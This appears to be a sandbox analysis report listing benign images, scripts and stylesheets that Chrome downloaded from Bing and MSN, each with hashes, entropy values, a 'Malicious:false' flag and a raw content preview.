                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_7lDDgveHgPH3hPXeGO3Fuw&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<3.j....G"D....88.U@j.+g.....x.....w....#.?.....OE.rpz.XK<..p[...e....V.....)..Ky...w.......N.j.wn....*....z....d.rk:.R5.7.^]L..........)..}i.x..}qV!..y.?y..X(..ts....{v..?.U...8#.zV..,..F...1.....A.=.......s.!.......%..v..\..ys.....]q...TLq...j...<.v;.......[.......F.....J..,h...bI...m?@.F..oq..q+........l/....5_.V.........T.1..6.....=[<...z......l.B
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):226
                                                                                                                                                                                                                                                                        Entropy (8bit):4.923112772413901
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                                                                                                                                                                                        MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                                                                                                                                                                                        SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                                                                                                                                                                                        SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                                                                                                                                                                                        SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):225826
                                                                                                                                                                                                                                                                        Entropy (8bit):7.997591578026521
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:6144:p7TNznG8JwsweeGhLh+tGvnsi74hkdqySyWhRo+F:p7ThG8+teeGhKUv74HyS5mQ
                                                                                                                                                                                                                                                                        MD5:66CA49C5E9F38102BE83941EDBBE3FF0
                                                                                                                                                                                                                                                                        SHA1:08E06EBEFE20B22D1764A2275CD9AAE78F65A062
                                                                                                                                                                                                                                                                        SHA-256:A90FEC7BF86C6274F7C1A3CE196F5E444958A6021FDDFB5A3D9AFE9A14DA7BF9
                                                                                                                                                                                                                                                                        SHA-512:71A417D326F4853F105BB69F95703C9CFB4196637861394E76E9653B290D6CD2969F13AE8A344464B32362BFF309625596A315EA112F74308245A93423C4EBBE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OHR.CERNCenter_EN-US9854867489_1920x1080.webp&qlt=50
                                                                                                                                                                                                                                                                        Preview:RIFF.r..WEBPVP8X.... ......7..ICCPH......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):21350
                                                                                                                                                                                                                                                                        Entropy (8bit):7.95053785627855
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e+LCi3OrS1wC+IZVoq67XbIwJ1H2oSSBHYUPpCFpr9hkS:e+FmSmIZV967LIwJN9YUBC7rrkS
                                                                                                                                                                                                                                                                        MD5:C9FECC8E242B51A01A5B3019C67D7F50
                                                                                                                                                                                                                                                                        SHA1:0F78FD5BEE7F42C1B6478655C18CDBB4C541498D
                                                                                                                                                                                                                                                                        SHA-256:1C4688FFEB017B42771905AF8591B59F80D1DD03706A24200BD098D460B3D55D
                                                                                                                                                                                                                                                                        SHA-512:B0C4EEE33E02AD6CD4924BFAEBFB0C8E2CD6DF1FF0D65A87FBDAD22511DD9E2D8191131DF8B26B1D39D02F17FC4A1C2E920D2BBD371D2F9FF2D8A451E05416CB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.377035f3b206bb8e3f0b01581e7bf495&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....U.x.1.5r;.0........Z..S!@..(.R..y.1r..:.1..jw...XV...R+F.C.5.....[X'.`.L.......vO.[S...I.*.o<.j.q.]...o3ZI..E]..`{y1YW.8RA.o.]..McX...cc.=iF^.3...Y.>........tG.$e..j.....o..]..=.....r:.9...........J...s.<E..T..;...C.....k....._E.j0[2..A>.J.K;../.^|x..IZMH..4*;.....i..r\[0Y....k..........L......4...y-.s....ZY......;....iq.^#.8......|..:..R...L..&..P
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3363
                                                                                                                                                                                                                                                                        Entropy (8bit):5.195022922251816
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                                                                                                                                                                                        MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                                                                                                                                                                                        SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                                                                                                                                                                                        SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                                                                                                                                                                                        SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):409
                                                                                                                                                                                                                                                                        Entropy (8bit):6.974521018329099
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPf+nMR3y2p7BwgFljMFEMCNn5inVvVunXKF9lsfW53A5FA/ZaUznTlO6lqQ:6v/7unM3lyuFVNNna4XABu5o/16Qp
                                                                                                                                                                                                                                                                        MD5:80969A6D700E813EF741D172674FEADD
                                                                                                                                                                                                                                                                        SHA1:361263C136CD857BA53FD7743C971BB7527BF12E
                                                                                                                                                                                                                                                                        SHA-256:0775687711D232F4C891F22CBC4040464E160C09044DEAA12C98BFBAB9C79CD6
                                                                                                                                                                                                                                                                        SHA-512:424891BE46A924B3DD222B39DEB740A54DED4C20818C5B4AF80E2BCF3B671260AA9E910C2D6F9FB48700D6E8DB370E0F0B52842499B7C885934108ABFEBCD4A2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............(-.S....gAMA......a.....sRGB........{PLTEGpL.............\...........\..a. ...W....!.. h..t. ..................m.....{..t.!...f. ......R.....\. .........a.<..........H.....tRNS... ..=....... ..........IDAT..E.[.. .@.`D.k.ZA..j...&j...C`..(...R..Q!......4hVC%.#......d..xR/....(WA.....a..1r.a...v...X....F.]..]g.P....m[....}..<AZ.....!F/...1..^.Wj..K.}.....]......L....IEND.B`.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65448)
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):548910
                                                                                                                                                                                                                                                                        Entropy (8bit):5.429601585794126
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:gQPnVAMhSp4UquNy1l0F26xz4lmualqeyJg2NbQ/qipeL1GbQY:TkARl0FZz4lmfolJYee
                                                                                                                                                                                                                                                                        MD5:DF637DF6078E65EA2BB15807BDE1D4E4
                                                                                                                                                                                                                                                                        SHA1:DBB58CFB7CB67E8D16477A07C10D4034313AD513
                                                                                                                                                                                                                                                                        SHA-256:9E0EBE12CED0B67B08448E0CFA4FC3F8CFE3031602C0F5BC1107FF56AE178304
                                                                                                                                                                                                                                                                        SHA-512:9477448072C428FA3380B374F5B0CBAEE5B59D54C55ABBDE72F8A6CB8CB2FBDEDCC1D44D539B9ED8DE7000C2E872E7AC45BCB8EE8761C4557B1B8FEC03134440
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/microsoft.507f3331f95b815a1b1a.js
                                                                                                                                                                                                                                                                        Preview:/*! For license information please see microsoft.507f3331f95b815a1b1a.js.LICENSE.txt */.(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["microsoft"],{63165:function(t,e,n){"use strict";n.d(e,{Z:function(){return D}});var i=n(45362),r=n(23806),o=n(80221),s=n(60851),a=n(26454),l=n(254),c=n(74539),u=n(98500),d=n(69509),h=n(39289),p=500;function f(t,e,n){e&&(0,c.kJ)(e)&&e[l.R5]>0&&(e=e.sort((function(t,e){return t[u.yi]-e[u.yi]})),(0,c.tO)(e,(function(t){t[u.yi]<p&&(0,c._y)("Channel has invalid priority - "+t[l.pZ])})),t[l.MW]({queue:(0,c.FL)(e),chain:(0,d.jV)(e,n[l.TC],n)}))}var g=n(85282),v=n(5482),m=n(33220),b=n(26932),y=function(t){function e(){var n,i,a=t.call(this)||this;function d(){n=0,i=[]}return a.identifier="TelemetryInitializerPlugin",a.priority=199,d(),(0,r.Z)(e,a,(function(t,e){t.addTelemetryInitializer=function(t){var e={id:n++,fn:t};return i[l.MW](e),{remove:function(){(0,c.tO)(i,(function(t,n){if(t.id===e.id)return i[l.c
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1678
                                                                                                                                                                                                                                                                        Entropy (8bit):4.81400252276251
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:MMj7e9MFxC3Ta8E8Z6eElrPwpGb34GEZ8A74IJ:1jyMMa8tZ6eElrYFGUt7
                                                                                                                                                                                                                                                                        MD5:60603DC161A2E92F9A5C12669EF98773
                                                                                                                                                                                                                                                                        SHA1:F99780FE3E260CA78E7C34D55E07638FAA29D36C
                                                                                                                                                                                                                                                                        SHA-256:629299A751D3E24300B7F723F1F1C51C3CAA4F7A4F08012D28A85191988642DD
                                                                                                                                                                                                                                                                        SHA-512:768EC65A734CE0C72229B909D718773BD318D4C50A7382892CC086A857C1AC361E92E961AA2232AE9415B699CD4963DC09933F1A31D265D65394AA0317231325
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx.eSmH.Q.~..t:.J+.4..B-RT4LE.$..."...?...i?.C........2].*gjJ.Z..HQQ2...N.s{;.....{.s..^.{.......N.t6.l....%..B.q#'.....)[E...........*'....&.:..lV....9S...x..mr.|3.iJ\.e..@...W.....n.......8(lVpb.".C ..[.WM.N...>...X.U.{..Dx*..~B.A....d....!5... nG...X5.S..Z.1......p.r....sE....I....;..#U.8.`.8......<5...y.5+..u...E...8Qa^X2>....*.u...H;.w...........6.G6.@.nz...Z..&.:...53J.s..D.O..OP.<..b&]........8.G!.Dd.f..s...b..oW)tKs......[ w...z..n2agd.2...C...r......i..z......;.%8.....L...I.i.5.c{A..\..Wg1.\....H...F..E:.Pa..-..w..p.uU..n.iN...<.7;".7.f....{.....t]S.:..\........).}p~.M.o..}y..6...7U<..l.s..............w.i....-.p......r(...E..4|].r~.@O..D...{...(3R#..rJj........Z...Z.....V.$..o....m.m........Z.qV.o..V.q6Q.c.. ..l>e.n....IEND.B`..................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1111
                                                                                                                                                                                                                                                                        Entropy (8bit):4.61511796141903
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:twgonGLheJUVYxCdBTMqTS05sLGkkhQgbQgwHW4QhJ:6gAShpyxCdBTrS05sLKhvUfSJ
                                                                                                                                                                                                                                                                        MD5:C04C8834AC91802186E6CE677AE4A89D
                                                                                                                                                                                                                                                                        SHA1:367147873DA32FACB30A1B4885A07920854A6399
                                                                                                                                                                                                                                                                        SHA-256:46CC84BA382B065045DB005E895414686F2E76B64AF854F5AD1AC0DF020C3BDB
                                                                                                                                                                                                                                                                        SHA-512:82388309085BD143E32981FE4C79604DCEFC4222FB2B53A8625852C3572BDE3D3A578DD558478E6A18F7863CC4EC19DFBA3EE78AD8A4CC71917BFFE027DC22C0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/NnFHhz2jL6yzChtIhaB5IIVKY5k.svg
                                                                                                                                                                                                                                                                        Preview:<svg width="20px" height="16px" viewBox="0 0 20 16" focusable="false" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <g transform="translate(-10, -12)" fill="#007DAA" >.. <path d="M28.125,14.4615385 L25,14.4615385 L24.26875,13.0203077 C23.95125,12.3950769 23.30125,12 22.59125,12 L17.40875,12 C16.69875,12 16.04875,12.3950769 15.73125,13.0203077 L15,14.4615385 L11.875,14.4615385 C10.84,14.4615385 10,15.2886154 10,16.3076923 L10,26.1538462 C10,27.1729231 10.84,28 11.875,28 L28.125,28 C29.16,28 30,27.1729231 30,26.1538462 L30,16.3076923 C30,15.2886154 29.16,14.4615385 28.125,14.4615385 Z M20,25.5384615 C17.23875,25.5384615 15,23.3341538 15,20.6153846 C15,17.8966154 17.23875,15.6923077 20,15.6923077 C22.76125,15.6923077 25,17.8966154 25,20.6153846 C25,23.3341538 22.76125,25.5384615 20,25.5384615 Z M20,18.1538462 C18.62125,18.1538462 17.5,19.2578462 17.5,20.6153846 C17.5,21.9729231 18.62125,23.0769231 20,23.0769231 C21.37875,23.0769231
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6005
                                                                                                                                                                                                                                                                        Entropy (8bit):7.9282191159615
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEsFXLKgXvbN8PavnOROTsFBSUI7ykx+h1Boc9EXW/Y3rkQ6ngsdf9:ygl9rXvbN8PavORnBSUIWonci7ktngs
                                                                                                                                                                                                                                                                        MD5:52A594FB59BE6F84D5E208ACDB82CD94
                                                                                                                                                                                                                                                                        SHA1:D5DAAA1FF6BAA4DF9A508F40A37FD6FF8DC01FA7
                                                                                                                                                                                                                                                                        SHA-256:1C61BF996F99F0CB8B46C2E14E98A16BEA5BA99F7014E601DE1D5332EF58E7A7
                                                                                                                                                                                                                                                                        SHA-512:A3AA156C2337FD3EE2CC38FEA9F8AB6209BD99243AD50E8AE59970478394E38E0F77E144155500CE91AF6120449995A88F41A0C166D297637DCE41BC044ACEE4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_u43i8V1G9GUsmoavpJIohg&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..C.9v1....M.&@.....J.<!.#I...;..(T..#.J..l1.b.....2FUm...*RP.g...?Jg.....x..L..PL.z..k.C....a.`.anA..w.D`...~..ecw.jQi.9ie.RDh>.v......GNM/MK}....K.e..J.....~..>.c..)S.w{.9YY..C...C.,qF.Q.`(..)....UV..x. .YIs...7_..R.Q..Wk...E7.?.....5^i-.1JQ..*. ......k....y.....g-..?2i...O.}H8...^.X..Z......Jq........F......GXy..t<~X.?....h.]mE.?.Al.R.G.^.c..YX.u.Hd.+.m~R..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:43:45], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3814
                                                                                                                                                                                                                                                                        Entropy (8bit):7.634659202076907
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:sQrbnTt8ATpTToooX6l4d309BEEGp0m1amWth0x/aA+9GnPoYXEcX:sS8AyJKl4xV0KamWtOb+SP0cX
                                                                                                                                                                                                                                                                        MD5:281570611F89219A970F2589F98A09DB
                                                                                                                                                                                                                                                                        SHA1:9E2DCCC8A295BBDA4AD12818EA06FA67634E1A98
                                                                                                                                                                                                                                                                        SHA-256:7BDAB4155253E159B748E2BE6CB1C0AF736F18D2A4DBDDF79D93D6219A3DE9DD
                                                                                                                                                                                                                                                                        SHA-512:FB9CAEE5B3FF8A3CE8C4D6D066CC0283A8A158E32131754CD9EFB1B4A25303CAA72FAE11C23E836B2A2F0D5005F0E39EB2A38D1D28CB81CAE5C1C818D77B80FB
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/ni3MyKKVu9pK0SgY6gb6Z2NOGpg.jpg
                                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:43:45....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;......................................................................................... .. ..... .. .. ..$................H.............. ..$..H .. .....AY .....: ...P$..$.. .tXAI ......@....9..I...Rt....f$.Z....+..,.. .t@1.Q.O=..3.l.#.v..1gZ,...[..A&.y.....j....=-.{.[.....5t.y.q..T..t.UY...Z.,..]....{...bI<.4`..<].m'...D..9.......z5.....0G..U.b.e.qn6k7cwo......1G=......)n..g..1.vZ...jIu..9.c.uo=..>...r..-......2..g.V.Z\.{.^c:..Jj.uY....5-."V...?...(......................!..".. .12#0@ABp...............>.....n..>..z..z..n.' .\.J.-...u#.....c~.@d.......|./..g..v....#..:a_....p=$Z.%.3..SN.G..Hi..*_.W........L.........$.?..p_.w. ..e.h..A..9.-[..n.F.......Q.. .2.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3621
                                                                                                                                                                                                                                                                        Entropy (8bit):7.869742556964816
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAczjHWu1zObitB0zRp5/tEHySKmpdvgWvPXba22J5ieGnCN9WpM:8zgE7vHWut5BWLeSspNjLa22J5i1CvW+
                                                                                                                                                                                                                                                                        MD5:AFA5114B4E0AB7C2770F87A24EB36CC0
                                                                                                                                                                                                                                                                        SHA1:F0443CD986DFA5AD165E91700639AC1B31F17CD9
                                                                                                                                                                                                                                                                        SHA-256:9434F5BD85A582483EF73E8B9FE18831894C311DB4C3A2BC3F3E9FE6CAC5A1BB
                                                                                                                                                                                                                                                                        SHA-512:DBD05FEE4CD440301B978E9B517CF8825AEBC34827BB120C0CC83EFD65393B7202C57FBD39091BF21A608FF91AEA3E114E2DEE63201DA5FEE650A0D36BF87103
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_-apHFCGZePml_B2QN3LKZA&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.."..=F.P...x.J.$...I.T....:Y........y.....l..?.'...?..?.....z..!6ooy...i..u.lw...r.d..d.z.^..E.i.].F.8'..a.z....Z.{....x.e..........J.9Kc..Ic....JL..V1..v$....W.......3e.....0........@..xoc..iO.r7t..|{{.....owq-.C.p.A.j.r...........G.Y....u..#..RxP.\c.9.....2x.....b.I%..y.l.wee\.T.......U]z[{.baEP&...=..)'u.*.:...n{}....}..cl....1....j.q.G..A....'.....L.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10425), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):10425
                                                                                                                                                                                                                                                                        Entropy (8bit):5.877747511835847
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:049BHgs5BZND4Nd37hkB6ow9jkBw6wGG6XO9p7TkBUeU:04MENsNvI6oyI1wgXO9ZI4
                                                                                                                                                                                                                                                                        MD5:B74765F3D1ED99C2FAC3FA5E4202DC4B
                                                                                                                                                                                                                                                                        SHA1:A48B155DBBC65470F381282A1F9E21FF2DD46B27
                                                                                                                                                                                                                                                                        SHA-256:1792B996F940322E3222D3ABE4B08A1AE60CD7FDA3E186FA008D14C0E541551D
                                                                                                                                                                                                                                                                        SHA-512:1AB28BE6C73CFC7B08B9529EBB3EBC028A46DC88CCDBF002FCFF4854F624BD0DC6BDA42185B47C1CA312B14D1978172E5737EFF53FC4C2BC96B593DDE8A35849
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://r.bing.com/rp/pIsVXbvGVHDzgSgqH54h_y3Uayc.css
                                                                                                                                                                                                                                                                        Preview:#rewardsEntryPoint{display:block !important;position:fixed;top:-20%;right:0;z-index:1;opacity:.9}#rewardsEntryPoint:hover,#rewardsEntryPoint:focus{opacity:1}#rewardsEntryPoint.b_hide{display:none !important}#rewardsEntryPoint #overlayContainer{display:grid}#rewardsEntryPoint #overlayContainer #overlay,#rewardsEntryPoint #overlayContainer #pointsContainer{grid-area:none;height:50px;border-radius:50px 0 0 50px;box-shadow:0 0 2px 0 rgba(0,0,0,.12),0 4px 8px 0 rgba(0,0,0,.14)}#rewardsEntryPoint #overlayContainer #pointsContainer{background:linear-gradient(257deg,rgba(21,122,194,.9) 9.85%,rgba(12,182,95,.9) 70.99%)}#rewardsEntryPoint #overlayContainer #pointsContainer.hasMessage{width:174px}#rewardsEntryPoint #overlayContainer #pointsContainer:hover,#rewardsEntryPoint #overlayContainer #pointsContainer:focus{cursor:grabbing}#rewardsEntryPoint #overlayContainer #pointsContainer:hover #rewardsXClose.rms_img,#rewardsEntryPoint #overlayContainer #pointsContainer:focus #rewardsXClose.rms_img{dis
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1065
                                                                                                                                                                                                                                                                        Entropy (8bit):4.58625494968845
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:ttMD4XW6zQpmgG5fYQpmgG5j4zFQZcSXWEcoqRQ:HRSm/Nvm/CIXWW
                                                                                                                                                                                                                                                                        MD5:B3199E6BAF6D264405C122BF5EBE64A0
                                                                                                                                                                                                                                                                        SHA1:EE1B56CEA599BFC1921C96885B585A6ACF523531
                                                                                                                                                                                                                                                                        SHA-256:BBA51407483F3DECBA29C8D3398AC6F244B415BE04055123775C4A428CFDFDDC
                                                                                                                                                                                                                                                                        SHA-512:5CB6654495A14595BCE84C0AA6C26FDFBE0E44E0E44DB703392641F772D26B4C6835501EEB5410CBBE6D882A3199795A812782472BED5A8A8D951CB56237B007
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
